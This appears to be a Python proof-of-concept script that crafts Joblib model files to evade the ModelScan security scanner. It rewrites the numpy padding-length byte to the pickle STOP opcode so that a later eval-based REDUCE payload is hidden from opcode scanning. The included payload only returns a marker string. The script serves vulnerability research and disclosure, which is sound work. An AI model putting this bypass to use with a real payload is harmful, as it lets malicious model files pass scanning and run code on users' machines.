modelscan-joblib-numpy-padding-bypass-poc / joblib_numpy_padding_probe.py
katsuiy
Add ModelScan Joblib padding PoC
9d04701
#!/usr/bin/env python3
"""Generate benign Joblib artifacts for numpy padding traversal checks."""
from __future__ import annotations
import argparse
import io
import json
import os
import pathlib
import pickletools
import re
import shutil
import subprocess
from dataclasses import dataclass
from typing import Any
import joblib
import numpy as np
# Constant string the benign payload evaluates to; contains_marker() compares
# loaded values against it.
MARKER = "BENIGN_JOBLIB_MARKER"
# 0x2E is the byte "." -- the pickle STOP opcode. It is also the value the
# padding-length byte is rewritten to.
PICKLE_STOP = 0x2E
# Filler byte inserted when the padding run is lengthened.
JOBLIB_PADDING_BYTE = b"\xff"
# Pickle protocol passed to joblib.dump().
PICKLE_PROTOCOL = 4
class BenignEval:
    """Harmless stand-in for an unsafe-global pickle payload.

    Pickling an instance records a call to ``eval`` whose only argument is
    the ``repr`` of ``MARKER``, so unpickling yields the marker string and
    does nothing else.
    """

    def __reduce__(self) -> tuple[Any, tuple[str]]:
        """Return the ``(callable, args)`` pair the pickler should record."""
        # repr() of a str is a quoted literal, so eval() hands back MARKER.
        marker_literal = repr(MARKER)
        return eval, (marker_literal,)
@dataclass(frozen=True)
class PaddingPatch:
    """Immutable record of one padding-length rewrite."""

    # Index of the padding-length byte within the serialized data.
    offset: int
    # Value of the padding-length byte before patching.
    original_length: int
    # Value of the padding-length byte after patching.
    patched_length: int
    # Number of filler bytes added after the length byte.
    inserted_bytes: int
    # Index of the first byte after the padding run, before patching.
    array_data_offset_before: int
    # Index of the first byte after the padding run, after patching.
    array_data_offset_after: int
def dump_joblib_bytes(value: Any) -> bytes:
    """Serialize *value* with joblib into memory and return the raw bytes.

    Compression is disabled and the module-level ``PICKLE_PROTOCOL`` is used.
    """
    with io.BytesIO() as sink:
        joblib.dump(value, sink, compress=0, protocol=PICKLE_PROTOCOL)
        return sink.getvalue()
def find_first_numpy_padding(data: bytes) -> int:
    """Return the offset at which pickle opcode parsing first breaks down.

    The serialized stream is walked with ``pickletools.genops``. The walk is
    expected to fail on an unknown opcode directly after a ``BUILD`` opcode,
    with the ``numpy_array_alignment_bytes`` attribute name appearing earlier
    in the stream. The failing position is returned; callers treat the byte
    there as the padding-length byte.

    Args:
        data: Serialized bytes to inspect.

    Returns:
        Offset of the first byte that pickletools rejects as an opcode.

    Raises:
        RuntimeError: If parsing succeeds without interruption, fails for a
            reason other than an unknown opcode, does not stop right after a
            ``BUILD`` opcode, or the alignment attribute name is absent from
            the bytes before the stop.
    """
    # Only the most recent opcode matters, so no opcode history is kept.
    last_opcode_name: str | None = None
    try:
        for opcode, _arg, _pos in pickletools.genops(data):
            last_opcode_name = opcode.name
    except ValueError as exc:
        # Match only pickletools' "at position N, opcode ... unknown" text.
        # A looser pattern would also match UnicodeDecodeError ("in position
        # N"), which is a ValueError whose N indexes into a string argument
        # rather than into the stream.
        match = re.search(r"at position (\d+), opcode", str(exc))
        if not match:
            raise RuntimeError(f"could not locate pickle parse stop: {exc}") from exc
        offset = int(match.group(1))
        if last_opcode_name != "BUILD":
            raise RuntimeError(
                "pickle parsing did not stop immediately after a numpy wrapper BUILD"
            )
        if b"numpy_array_alignment_bytes" not in data[:offset]:
            raise RuntimeError("joblib numpy alignment metadata was not found")
        return offset
    raise RuntimeError("expected raw numpy array bytes to interrupt pickle parsing")
def patch_padding_to_stop(data: bytes) -> tuple[bytes, PaddingPatch]:
    """Rewrite the padding-length byte to ``PICKLE_STOP`` and grow the padding.

    The byte located by ``find_first_numpy_padding`` is replaced with
    ``PICKLE_STOP``. Enough ``JOBLIB_PADDING_BYTE`` filler is inserted right
    after it that the padding run is ``PICKLE_STOP`` bytes long in total.

    Returns:
        The patched bytes and a ``PaddingPatch`` describing the change.

    Raises:
        RuntimeError: If the existing length byte is outside 1..64, or is
            already at least ``PICKLE_STOP``.
    """
    length_index = find_first_numpy_padding(data)
    current_length = data[length_index]

    if current_length < 1 or current_length > 64:
        raise RuntimeError(f"unexpected joblib padding length: {current_length}")
    if current_length >= PICKLE_STOP:
        raise RuntimeError(
            f"padding length {current_length} does not need a STOP-byte expansion"
        )

    filler_count = PICKLE_STOP - current_length
    head = data[:length_index]
    # The tail still starts with the original padding bytes; the new filler
    # goes in front of them.
    tail = data[length_index + 1 :]
    rewritten = head + bytes((PICKLE_STOP,)) + JOBLIB_PADDING_BYTE * filler_count + tail

    after_length_byte = length_index + 1
    details = PaddingPatch(
        offset=length_index,
        original_length=current_length,
        patched_length=PICKLE_STOP,
        inserted_bytes=filler_count,
        array_data_offset_before=after_length_byte + current_length,
        array_data_offset_after=after_length_byte + PICKLE_STOP,
    )
    return rewritten, details
def write_bytes(path: pathlib.Path, data: bytes) -> None:
    """Write *data* to *path*, creating missing parent directories first."""
    folder = path.parent
    folder.mkdir(parents=True, exist_ok=True)
    with path.open("wb") as handle:
        handle.write(data)
def load_status(path: pathlib.Path) -> dict[str, Any]:
    """Load *path* with joblib and describe the outcome as a plain dict.

    Returns:
        On success: ``status`` ("ok"), the loaded value's ``type`` name, its
        ``repr``, and ``marker_found`` from ``contains_marker``.
        On failure: ``status`` ("error") and ``error``, formatted as
        ``"<ExceptionType>: <first line of message>"``.
    """
    try:
        value = joblib.load(path)
    except Exception as exc:  # any load failure is reported, not raised
        # str(exc) can be empty (e.g. ``EOFError()``), in which case
        # splitlines() returns [] and indexing [0] would raise IndexError
        # from inside this handler.
        message_lines = str(exc).splitlines()
        first_line = message_lines[0] if message_lines else ""
        return {
            "status": "error",
            "error": f"{type(exc).__name__}: {first_line}",
        }
    return {
        "status": "ok",
        "type": type(value).__name__,
        "repr": repr(value),
        "marker_found": contains_marker(value),
    }
def contains_marker(value: Any) -> bool:
    """Report whether ``MARKER`` appears as a string inside *value*.

    Strings are compared for equality with ``MARKER``. Dict values and the
    items of lists and tuples are searched recursively. Every other kind of
    value counts as "not found".
    """
    if isinstance(value, str):
        return value == MARKER

    # Scalar and buffer-like values can never hold the marker string.
    is_leaf = value is None or isinstance(
        value,
        (np.ndarray, bytes, bytearray, memoryview, bool, int, float, complex),
    )
    if is_leaf:
        return False

    if isinstance(value, dict):
        children = value.values()
    elif isinstance(value, (list, tuple)):
        children = value
    else:
        return False

    for child in children:
        if contains_marker(child):
            return True
    return False
def opcode_positions(data: bytes, opcode_name: str, start: int = 0) -> list[int]:
    """List the offsets of every opcode named *opcode_name*.

    Parsing begins at ``data[start:]``. The returned offsets are relative to
    the beginning of *data*, not to *start*. Any error raised by
    ``pickletools.genops`` propagates to the caller.
    """
    return [
        start + relative_pos
        for op, _arg, relative_pos in pickletools.genops(data[start:])
        if op.name == opcode_name
    ]
def opcode_offsets(data: bytes) -> dict[str, int | None]:
    """Locate a few landmark byte sequences in *data* by raw byte search.

    These are plain substring searches, not an opcode-level parse.

    Returns:
        A dict with the first offset of ``b"builtins"``, ``b"eval"`` and the
        encoded ``MARKER``, plus the last offset of the ``PICKLE_STOP`` byte.
        Any landmark that is absent maps to ``None``.
    """
    # bytes.rfind signals "absent" with -1. Convert it to None so that all
    # four fields use the same convention as find_bytes().
    last_stop = data.rfind(bytes([PICKLE_STOP]))
    offsets: dict[str, int | None] = {
        "builtins_string": find_bytes(data, b"builtins"),
        "eval_string": find_bytes(data, b"eval"),
        "marker_string": find_bytes(data, MARKER.encode()),
        "final_stop_opcode": last_stop if last_stop >= 0 else None,
    }
    return offsets
def find_bytes(data: bytes, needle: bytes) -> int | None:
    """Return the first offset of *needle* in *data*, or ``None`` if absent."""
    try:
        return data.index(needle)
    except ValueError:
        return None
def modelscan(path: pathlib.Path, command: pathlib.Path | None) -> dict[str, Any]:
    """Run the ModelScan CLI against *path* and condense its JSON report.

    Args:
        path: Artifact to scan.
        command: Path to the ``modelscan`` executable, or ``None`` to skip.

    Returns:
        * ``{"status": "skipped"}`` when *command* is ``None``.
        * ``{"status": "missing", "command": ...}`` when *command* does not
          exist.
        * ``{"status": "error", "command": ..., "error": ...}`` when the
          process could not be started.
        * Otherwise ``status`` ("ok" or "parse_error"), ``returncode``,
          ``modelscan_version``, ``total_issues`` and ``errors``. On
          "parse_error" the raw stdout (``parse_error``) and ``stderr`` are
          included so the failure can be diagnosed.
    """
    if command is None:
        return {"status": "skipped"}
    if not command.exists():
        return {"status": "missing", "command": str(command)}

    try:
        completed = subprocess.run(
            [
                str(command),
                "-p",
                str(path),
                "-r",
                "json",
                "--show-skipped",
            ],
            text=True,
            capture_output=True,
            # A very wide terminal is advertised to the child process.
            env={**os.environ, "COLUMNS": "20000"},
            check=False,
        )
    except OSError as exc:
        # The path exists but cannot be executed (a directory, missing
        # permissions, a bad interpreter line, ...). Report it rather than
        # aborting the whole probe.
        return {
            "status": "error",
            "command": str(command),
            "error": f"{type(exc).__name__}: {exc}",
        }

    stdout = completed.stdout.strip()
    report: dict[str, Any] | None = None
    # Skip anything printed before the first "{" and decode one JSON
    # document from there. raw_decode tolerates trailing text after it.
    json_start = stdout.find("{")
    if json_start >= 0:
        try:
            decoded, _end = json.JSONDecoder().raw_decode(stdout[json_start:])
        except json.JSONDecodeError:
            decoded = None
        if isinstance(decoded, dict):
            report = decoded

    if report is None or "parse_error" in report:
        return {
            "status": "parse_error",
            "returncode": completed.returncode,
            "modelscan_version": None,
            "total_issues": None,
            "errors": report.get("errors") if report is not None else None,
            "parse_error": stdout,
            "stderr": completed.stderr.strip(),
        }

    summary = report.get("summary")
    if not isinstance(summary, dict):
        # A missing or malformed summary yields None fields, not a crash.
        summary = {}
    return {
        "status": "ok",
        "returncode": completed.returncode,
        "modelscan_version": summary.get("modelscan_version"),
        "total_issues": summary.get("total_issues"),
        "errors": report.get("errors"),
    }
def summarize(
    case: str,
    path: pathlib.Path,
    modelscan_command: pathlib.Path | None,
    extra_offsets: dict[str, Any] | None = None,
) -> dict[str, Any]:
    """Assemble the per-artifact report for one test case.

    The report holds the case name, the file path and size, the
    ``load_status`` result, landmark offsets from ``opcode_offsets`` (with
    *extra_offsets* merged on top) and the ``modelscan`` result.
    """
    raw = path.read_bytes()

    merged_offsets: dict[str, Any] = opcode_offsets(raw)
    merged_offsets.update(extra_offsets or {})

    # The artifact is loaded before it is scanned.
    load_result = load_status(path)
    scan_result = modelscan(path, modelscan_command)

    report: dict[str, Any] = {}
    report["case"] = case
    report["path"] = str(path)
    report["size"] = len(raw)
    report["joblib_load"] = load_result
    report["offsets"] = merged_offsets
    report["modelscan"] = scan_result
    return report
def main() -> int:
    """Build the control and patched candidate artifacts and report on each.

    Two files are written under the output directory: a control containing
    only ``BenignEval``, and a candidate containing a small uint8 array
    followed by ``BenignEval``, with its padding patched by
    ``patch_padding_to_stop``. One JSON line per artifact is printed to
    stdout.

    Returns:
        ``0`` always; failures surface as exceptions.
    """
    cli = argparse.ArgumentParser()
    cli.add_argument(
        "output_dir",
        nargs="?",
        type=pathlib.Path,
        default=pathlib.Path("corpus/joblib_numpy_padding_probe"),
    )
    cli.add_argument("--modelscan-command", type=pathlib.Path, default=None)
    cli.add_argument("--skip-modelscan", action="store_true")
    options = cli.parse_args()

    if options.skip_modelscan:
        modelscan_command = None
    else:
        modelscan_command = resolve_modelscan_command(options.modelscan_command)

    def emit(case: str, artifact: pathlib.Path, extras: dict[str, Any]) -> None:
        # One sorted-key JSON object per line keeps the output diff-friendly.
        print(
            json.dumps(
                summarize(case, artifact, modelscan_command, extras),
                sort_keys=True,
            )
        )

    out_dir = options.output_dir
    control_path = out_dir / "control_direct.joblib"
    candidate_path = out_dir / "candidate_numpy_array_then_payload_patched.joblib"

    control_bytes = dump_joblib_bytes(BenignEval())
    write_bytes(control_path, control_bytes)

    # The array's first element is PICKLE_STOP; the remaining bytes are filler.
    array = np.array([PICKLE_STOP, 0, 1, 2, 3, 4, 5, 6], dtype=np.uint8)
    candidate_bytes = dump_joblib_bytes([array, BenignEval()])
    patched_candidate_bytes, patch = patch_padding_to_stop(candidate_bytes)
    write_bytes(candidate_path, patched_candidate_bytes)

    emit(
        "control_direct",
        control_path,
        {"payload_reduce_opcode_offsets": opcode_positions(control_bytes, "REDUCE")},
    )

    # Offset just past the raw array bytes; opcode parsing resumes from here.
    payload_frame_offset = patch.array_data_offset_after + array.nbytes
    emit(
        "candidate_numpy_array_then_payload_patched",
        candidate_path,
        {
            "padding_length_offset": patch.offset,
            "padding_original_length": patch.original_length,
            "padding_patched_length": patch.patched_length,
            "padding_inserted_bytes": patch.inserted_bytes,
            "array_data_offset_before_patch": patch.array_data_offset_before,
            "array_data_offset_after_patch": patch.array_data_offset_after,
            "array_first_byte_after_patch": patched_candidate_bytes[
                patch.array_data_offset_after
            ],
            "payload_frame_offset_after_patch": payload_frame_offset,
            "payload_reduce_opcode_offsets_after_patch": opcode_positions(
                patched_candidate_bytes,
                "REDUCE",
                payload_frame_offset,
            ),
        },
    )
    return 0
def resolve_modelscan_command(command: pathlib.Path | None) -> pathlib.Path | None:
    """Pick the ModelScan executable to use.

    Preference order: the explicit *command*; the project-local
    ``.venv-modelscan/bin/modelscan`` if it exists; ``modelscan`` found on
    ``PATH``. If none is available, the project-local path is returned
    anyway, even though it does not exist.
    """
    if command is not None:
        return command

    venv_candidate = pathlib.Path(".venv-modelscan/bin/modelscan")
    if not venv_candidate.exists():
        on_path = shutil.which("modelscan")
        if on_path is not None:
            return pathlib.Path(on_path)
    return venv_candidate
# Script entry point: main()'s return value becomes the process exit status.
if __name__ == "__main__":
    raise SystemExit(main())